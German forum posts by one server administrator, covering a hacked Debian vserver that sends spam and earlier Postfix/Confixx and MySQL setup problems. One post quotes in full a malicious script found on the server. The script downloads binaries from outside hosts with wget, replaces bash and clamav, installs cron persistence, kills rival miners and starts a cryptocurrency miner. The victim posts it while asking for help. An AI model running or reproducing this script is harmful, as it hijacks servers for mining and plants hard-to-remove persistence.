Beiträge von kameltreiber84

Auf den neuen Image haben die Nutzer keinen Zugriff. ich glaube auch mittlerweile weniger, dass der Hacker ssh Zugriff hatte. Die Zugriffe heute waren nur alle 10-20 min einamlig. Gehe ich mit dem Server Online gehen die Mails jedoch sofort (!) in scharen raus.

Zitat von kastenkola

Ist es möglich das jemand eine Mailbox anlegen konnte und darüber sendet, oder noch schlimmer der Spam über eine Adresse gesendet wird die in Froxlor etc angelegt worden ist und einfach die Zugangsdaten bekannt geworden sind?

So etwas ist wahrscheinlich. Ich frage mich jedoch warum dann meine cleaner Backup vom 5. Januar auch sofort Spam versendet. Der Hacker muss also irgendwelche Zugangsdaten haben. Merkwürdig ist, dass er einfach weitersendet wenn ich die Mail / SQL / root-Passwörter ändere. Ich habe mal in SsyCP reingeschaut: Dort sind keine verdächtigenm Konten oder MailAdressen sichtbar. Beim Blick in die Spam Mails wird eine bereits bestehender Mail-Adresse von mir verwendet, oder eine solche, wo der erste Buchstabe fehlt. Zumindest ist das die Angabe zum Absender der Mail. In /var/customers/mail ist sonst leider nichts auffällig.

Hallo,

ich führe hier einfach mal meinen Jagd-Fortschritt fort

Ich habe den Server heute mal als neues Debian Image im Rettungsmodus gestartet. Ind er Log ist dort zu sehen, dass der Hacker den ganzen Tag versucht hat eine SSH-Verbindung aufzubauen:

Jan 23 14:22:16 haccp-system sshd[22454]: Address 61.174.49.103 maps to 103.49.174.61.dial.wz.zj.dynamic.163data.com.cn, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!
Jan 23 14:22:18 haccp-system sshd[22454]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=61.174.49.103  user=root
Jan 23 14:22:19 haccp-system sshd[22454]: Failed password for root from 61.174.49.103 port 41959 ssh2
Jan 23 14:22:22 haccp-system sshd[22454]: Failed password for root from 61.174.49.103 port 41959 ssh2
Jan 23 14:22:24 haccp-system sshd[22454]: Failed password for root from 61.174.49.103 port 41959 ssh2
Jan 23 14:22:24 haccp-system sshd[22454]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=61.174.49.103  user=root

Das ist defintiv der Angriffsversuch der sichd en ganzen Tag wiederholte!

Zitat von Dragon

Das unsichere Joomla ist gesichert oder gesperrt worden? Der gesamte Webspace wurde auf Schadcode untersuch?

Ja, inklusive Virenscanner und finds. Interessant ist aber insbesondere, dass der Angreifer sofort (wirklich sofort!) auch dort connecten kann. Dort scheint etwas automatisiert abzulaufen, was sofort immer einbricht. Ich klemme jetzt nach und nach Funktionen ab. Mit postfix start/stop sehe ich sofort ob er wieder spamt. Den backup kann ich immer zurückrollen.

Zitat von Dragon

(das müsste in den Mail-Logs ersichtlich sein)

Leider nicht Ich habe sogar find auf die Zeit des Eindringends ausgeführt und veränderte Dateien gesucht.

EDIT: Das abklemmen der Webeiten im Rettungsodus hat nicht geholfen, mit fehlt momentan leider eine Idee.

Hallo! Danke für den Hinweis.

Ich habe momentan einige Passwörter geändert und der Spam lässt sich nicht stoppen: rootpw, sqlrootpw, mail-postfächer pws.
Ich nehme nun mal sql in den Fokus. Es ist schon merkwürdig, dass das Remote Script einfach connecten kann, obwohl ich die Passörter alle ändere.

/etc/mysql/main.cf scheint zu viele Rechte zu haben! Wenn ich diese auf chmod 640 setzen ist folgende Auffälligkeit in der Syslog zu erkennen:
nJan 22 18:33:22 my-hostname postfix/postfix-script[9431]: starting the Postfix - Pastebin.com

Sieht aus als hätte hier jemand Zugriff diese Datei wieder zu ändern?

Mir scheint es mittlerweile, dass and dem startup Script nichts ungewöhnlich ist.

Hallo,

auf meinen upgedateten Debian-Wheezy Server ist ein Hacker eingedrungen, der Spam per SMTP verschickt. Mein alter Backup ist zwar noch clean, aber sobald ich mit diesem Online gehe, connected der Remote Server sofort und fürt ein bind9 Script aus.

Diesyslog zeigt folgende Auffäligkeit, siehe pastbin:
Jan 21 19:23:19 my-hostname rsyslogd: [origin software="rsyslogd" swVersion="5.8 - Pastebin.com

Die auth.log sieht sauber aus. In der mail.log erkenne ich den massenhaften Versand. Ich gehe davon aus, dass einen veraltete Joomla Version schuld ist. Es wurde sichtlich ein bind9 Scriipt ausgeführt. Hat einer eine Idee, wie ich die Ursache genau finden kann? Danke!

Korrekt, sauber ist wohl nur die Neuinstallation...

Vielen Dank.

Fakt ist:

• Es wird wiederum ein Script heruntergeladen. Dieses Script ist exakt das gleiche welches hier ausgeführt wird. Es ist generell möglich das in der Vergangenheit so ein anderes Script geladen und ausgeführt wurde.
• Das Script hat neue udn vermeintlich infizierte Versionen von clamav und sh heruntergeladen und integriert.
• Das Sctipt hat Crontabs modifiziert (z.B. /etc/cron.hourly/update)

Ich kann das System leider ohne weiteres nicht neu installieren. Die meisten Schaddateien habe ich zumindest manuell entfernt. Clamav habe ich deinstalliert und wieder insrtalliert. SH bleibnt eventuell infiziert. Wenn der Angreifer das Script der HTTP in der Vergangenheit ausgewechselt hat, ist "alles" weitere möglich.

Sehr interessant ist in diesem Zusammenhang, dass genau dies wirklich ein Bitcoining Wurm zu sein scheint:
Bitcoin Mining Wurm

Demnach löst ein Dist-upgrade von Debian 6 auf Debian 7 das Problem vollständig, Ich werde danach nochmals mit rkhunter und dem neuen clamscan scannen. Ein Restrisiko ist nicht auszuschließen

Danke soweit. Mich würde mal interessieren: Was passier mit clamav oder sh? Werden die ausgetauscht?

Ich habe folgendes Script auf meinem Server entdeckt:

#!/bin/sh
crontab -r
cd /tmp
rm -rf a* c* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
wget http://www.pigicrm.com/a >> /dev/null &&
chmod u+x update
rm -rf /etc/cron.hourly/update




cp update /etc/cron.hourly/
chattr -ia bash
chattr -ia *
wget http://70.32.88.93/clamav
wget http://70.32.88.93/sh
chmod +x sh
chmod +x clamav
mv clamav bash
kill -9 `ps x|grep miner|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep apacheX|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep pwnnetd3|grep -v grep|awk '{print $1}'`
PATH="." bash -o stratum+tcp://pool.linuxd.net:3333 -O DeBil.1:x -B
PATH="." sh -o stratum+tcp://pool.linuxd.net:3333 -O DeBil.1:x -B
chattr +ia bash
chattr +ia sh

Meine Crontabs waren folgendermaßen verändert:

* * * * * /tmp/mc-root/update >/dev/null 2>&1

Wer kann sehen welchen Schaden dies nun ausgelöst hat und wie ich das bestmöglich beheben kann? Danke!

PS: Alle Vorkomnisse der falschen Cron-Kommandos, der update Datrein und der Ordner mech.dir habe ich nun gelöscht.

Hallo,

ich wollte nach einiger Zeit mal wieder auf meinem vserver eine Datenbank anlegen, aber leider fuktioniert das nicht mehr. Ich erhalte im SYSCP folgenden Fehler-Output:

Zitat

Invalid SQL: CREATE DATABASE `floriansql3`
mysql error number: 1044
mysql error desc: Access denied for user 'root'@'%' to database 'floriansql3'
Time/date: 22/06/2011 07:54 PM
Script: /syscp/customer_mysql.php
Referer: http://{meineip}/syscp/customer_mysql.php?page=mysqls&action=add&s=80b998a289aa...{irgeneinhashcode}

Alles anzeigen

Auch in phpmyadmin wird per rotem Ausrufezeichen beim Anlegen "Kein Rechte" angezeigt.

Logge ich mich als root per mysql-console ein, erhalte ich ebensolche 1044-Fehlernachricht. Lediglich eine Datenbank namens test lässt sich per Console anlegen.

Was kann hier falsch sein?

Hier noch ein Auszug nach mysql> SHOW GRANTS;

Zitat

GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*B70643...{irgeneinhashcode}'

Vielen Dank, viele Grüße

Die neue Fehler Log hier:

Jun  4 11:45:57 v220100351282828 postfix/master[18734]: terminating on signal 15
Jun  4 11:45:58 v220100351282828 postfix/master[21873]: daemon started -- version 2.3.3, configuration /etc/postfix
Jun  4 11:46:09 v220100351282828 postfix/smtpd[21891]: connect from mail-in-11.arcor-online.net[151.189.21.51]
Jun  4 11:46:09 v220100351282828 postfix/smtpd[21891]: A037721B0706: client=mail-in-11.arcor-online.net[151.189.21.51]
Jun  4 11:46:09 v220100351282828 postfix/cleanup[21910]: A037721B0706: message-id=<4C092DC5.8080906@arcor.de>
Jun  4 11:46:09 v220100351282828 postfix/smtpd[21891]: disconnect from mail-in-11.arcor-online.net[151.189.21.51]
Jun  4 11:46:09 v220100351282828 postfix/qmgr[21876]: A037721B0706: from=<absender@arcor.de>, size=1823, nrcpt=1 (queue active)
Jun  4 11:46:09 v220100351282828 postfix/error[21911]: A037721B0706: [COLOR=Red]to=<web0p6@v220100351282828.yourvserver.net>, orig_to=<lindner@filyra.de>, relay=none, delay=0.06, delays=0.04/0.01/0/0.01, dsn=5.0.0, status=bounced (User unknown in virtual alias table)[/COLOR]
Jun  4 11:46:09 v220100351282828 postfix/cleanup[21910]: AD16F21B0708: message-id=<20100604164609.AD16F21B0708@v220100351282828.yourvserver.net>
Jun  4 11:46:09 v220100351282828 postfix/qmgr[21876]: AD16F21B0708: from=<>, size=3852, nrcpt=1 (queue active)
Jun  4 11:46:09 v220100351282828 postfix/bounce[21912]: A037721B0706: sender non-delivery notification: AD16F21B0708
Jun  4 11:46:09 v220100351282828 postfix/qmgr[21876]: A037721B0706: removed
Jun  4 11:46:10 v220100351282828 postfix/smtp[21913]: AD16F21B0708: to=<absender@arcor.de>, relay=mx.arcor.de[151.189.21.118]:25, delay=0.61, delays=0.02/0.01/0.11/0.48, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as D77B9301F7)
Jun  4 11:46:10 v220100351282828 postfix/qmgr[21876]: AD16F21B0708: removed

Der Server kennt irgendwie die EmailAddy nicht. Hier mal ein Screen aus meinem confixx.

[Blockierte Grafik: http://picfront.de/d/7Ets][Blockierte Grafik: http://www9.picfront.org/token/WJJC/2010/06/04/1823882.png]

Irgendwie kriegt er die Nicks Postfächer und alles andere nicht zueinander gemappt. Eine funktioniere config von wem würde wahrscheinlich schon sehr viel helfen (DANKE!)

Hiernochmal die aktuellen confixx:

/etc/postfix/confixx_localDomains (dort nicht mehr filyra, da es in mydestination ja steht...

v220100351282828.yourvserver.net confixx

/etc/postfix/confixx_virtualUsers

lindner@filyra.de web0p6

und schließlich die /etc/postfix/main.cf

# See /usr/share/postfix/main.cf.dist for a commented, more complete version







# Debian specific:  Specifying a file name will cause the first
# line of that file to be used as the name.  The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname




smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
biff = no




# appending .domain is the MUA's job.
append_dot_mydomain = no




# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h




# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_use_tls=yes
smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache




# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.




myhostname = v220100351282828.yourvserver.net
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = filyra.de, localhost, localhost.localdomain, relayhost = 
mynetworks = 127.0.0.0/8
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
mailbox_command=/usr/bin/procmail




smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
smtpd_sasl_local_domain =
broken_sasl_auth_clients = yes
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination







### CONFIXX POSTFIX ENTRY ###




virtual_maps = hash:/etc/postfix/confixx_virtualUsers, hash:/etc/postfix/confixx_localDomains




### /CONFIXX POSTFIX ENTRY ###

Wo liegt der verflixte Fehler, ich überschütte euch mit Danke wenn das endlich mal hinhaut

Hallo,
habe ich gemacht:

postmap /etc/postfix/confixx... füe die oben genannten config dateien.

Danke und Gruß

So langsam verzweifel ich hier noch:

Neuste Fehledermeldung in aus der mail.log:

Jun  3 17:28:12 v220100351282828 postfix/smtpd[22826]: warning: database /etc/aliases.db is older than source file /etc/aliases
Jun  3 17:28:13 v220100351282828 postfix/smtpd[22826]: connect from mail-in-09.arcor-online.net[151.189.21.49]
Jun  3 17:28:13 v220100351282828 postfix/smtpd[22826]: 5CD1C21B0026: client=mail-in-09.arcor-online.net[151.189.21.49]
Jun  3 17:28:13 v220100351282828 postfix/cleanup[22831]: 5CD1C21B0026: message-id=<4C082C70.8090902@arcor.de>
Jun  3 17:28:13 v220100351282828 postfix/smtpd[22826]: disconnect from mail-in-09.arcor-online.net[151.189.21.49]
Jun  3 17:28:13 v220100351282828 postfix/qmgr[22536]: 5CD1C21B0026: from=<derabsender@arcor.de>, size=1821, nrcpt=1 (queue active)
Jun  3 17:28:13 v220100351282828 postfix/local[22833]: warning: database /etc/aliases.db is older than source file /etc/aliases
Jun  3 17:28:13 v220100351282828 postfix/local[22833]: 5CD1C21B0026: to=<web0p6@v220100351282828.yourvserver.net>, orig_to=<angelegtemailinconfixx@meinedomain.de>, relay=local, delay=0.23, delays=0.21/0.01/0/0.01, dsn=5.1.1, [COLOR=Red]status=bounced (unknown user: "web0p6")[/COLOR]
Jun  3 17:28:13 v220100351282828 postfix/cleanup[22831]: 931F721B06FE: message-id=<20100603222813.931F721B06FE@v220100351282828.yourvserver.net>
Jun  3 17:28:13 v220100351282828 postfix/bounce[22834]: 5CD1C21B0026: sender non-delivery notification: 931F721B06FE
Jun  3 17:28:13 v220100351282828 postfix/qmgr[22536]: 5CD1C21B0026: removed
Jun  3 17:28:13 v220100351282828 postfix/qmgr[22536]: 931F721B06FE: from=<>, size=3824, nrcpt=1 (queue active)
Jun  3 17:28:13 v220100351282828 postfix/smtp[22835]: 931F721B06FE: to=<derabsender@arcor.de>, relay=mx.arcor.de[151.189.21.118]:25, delay=0.35, delays=0.02/0.01/0.11/0.22, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 9DDA5A9FA0)
Jun  3 17:28:13 v220100351282828 postfix/qmgr[22536]: 931F721B06FE: removed

Die confixx_localDomains habe ich angepasst:

meinedomain.de confixx

und die confixx_virtualUser hat nun (wobei web0p6 das zugeordnete Postfach ist:

inconfixxregistrierteemail@meinedomain.de web0p6

Was ist da los?

Danke, Gruß

Hallo,
habe ich soweit gemacht, leider hilft es nicht:

die confixx_virtualUsers so:

web1p1
@meinedomain.de web1p2
web2p1

und die confixx_localDomains so:
meinedomain.de confixx
eineanderedomain.de confixx
eineganzandere.de confixx[LEFT]
[/LEFT]
Danke, Gruß

Danke, jetzt bin ich schon einen Schritt weiter! Jetzt wird nur die eMail Addy selbst nicht gefunden:

lindner@filyra.de: host mail.filyra.de[7x.47.34.45] said: 550 5.1.1
lindner@filyra.de: Recipient address rejected: User unknown in local
recipient table (in reply to RCPT TO command)

Wo trage ich die eMails ein?

Danke, Gruß

Hallo,
leider kann mein mailserver keine Mails empfangen. Ich bin soweit nach http://forum.webhostlist.de/fo…onfixx-postfix-sasl2.htmlvorgegangen, bekomme aber einen Mail delivery failure, wenn ich an eine eMail meiner Domian senden will. Laut log ist der Fehleder der folgende:

Jun  3 08:37:48 v220100351282828 postfix/smtpd[20625]: connect from mail-in-08.arcor-online.net[151.189.21.48]
Jun  3 08:37:48 v220100351282828 postfix/smtpd[20625]: NOQUEUE: reject: RCPT from mail-in-08.arcor-online.net[151.189.21.48]: 554 5.7.1 <emailname@meinedomainhier.de>: [B][COLOR=Red]Relay access denied[/COLOR][/B]; from=<adressedioegesendethat@arcor.de> to=<emailname@meinedomainhier.de> proto=ESMTP helo=<mail-in-08.arcor-online.net>
Jun  3 08:37:48 v220100351282828 postfix/smtpd[20625]: disconnect from mail-in-08.arcor-online.net[151.189.21.48]

Jetzt weiß ich nicht, was hier misskonfiguriert,deshalb schicke ich euch mal den Auszug aus einigen meiner configs:

/etc/postfix/confixx_virtualUsers und /etc/postfix/confixx_localDomains sind leere Dateien.

/etc/postfix/sasl/smtpd.conf:

pwcheck_method: saslauthd
mech_list: PLAIN LOGIN
saslauthd_path: /var/run/saslauthd/mux
autotransition:true

/etc/postfix/main.cfg:

# See /usr/share/postfix/main.cf.dist for a commented, more complete version







# Debian specific:  Specifying a file name will cause the first
# line of that file to be used as the name.  The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname




smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
biff = no




# appending .domain is the MUA's job.
append_dot_mydomain = no




# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h




# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_use_tls=yes
smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache




# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.




myhostname = v220100351282828.yourvserver.net
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = v220100351282828, localhost, localhost.localdomain, v220100351282828.yourvserver.net
relayhost = 
mynetworks = 127.0.0.0/8
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
mailbox_command=/usr/bin/procmail




smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
smtpd_sasl_local_domain =
broken_sasl_auth_clients = yes
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination







### CONFIXX POSTFIX ENTRY ###




virtual_maps = hash:/etc/postfix/confixx_virtualUsers, hash:/etc/postfix/confixx_localDomains




### /CONFIXX POSTFIX ENTRY ###

Was ich bisher gemacht habe:

• Das etch Image mit confixx neu-installiert
• in confixx ein pop3-postfach angelegt
• in confixx eine email-adresse angelegt
• Installieren: apt-get install postfix-tls sasl2-bin libsasl2 libsasl2-modules
• Code

  [B]Unter /etc/pam.d/ ein File smtp erstellen mit folgendem Inhalt und in  die Postfix Umgebung kopieren:[/B]
  auth required /lib/security/pam_unix_auth.so
  account required /lib/security/pam_unix_acct.so
  password required /lib/security/pam_unix_passwd.so
  session required /lib/security/pam_unix_session.so
  
  
  
  
  mkdir /var/spool/postfix/etc/pam.d
  cp /etc/pam.d/smtp /var/spool/postfix/etc/pam.d/
  
  
  
  
  [B]Erstellen eines Verzeichnisses für saslauthd in der chroot-Umgebung von  Postfix:[/B]
  mkdir -p /var/spool/postfix/var/run
  cd /var/run
  mv saslauthd/ /var/spool/postfix/var/run
  ln -s /var/spool/postfix/var/run/saslauthd/ saslauthd
  
  
  
  
  adduser postfix sasl
  /etc/init.d/saslauthd start
  /etc/init.d/postfix reload

  Alles anzeigen

  
  

Das ganze führt aber leider immernoch zum Fehleder der obigen Log. Was läuft hier schief?

Danke und Gruß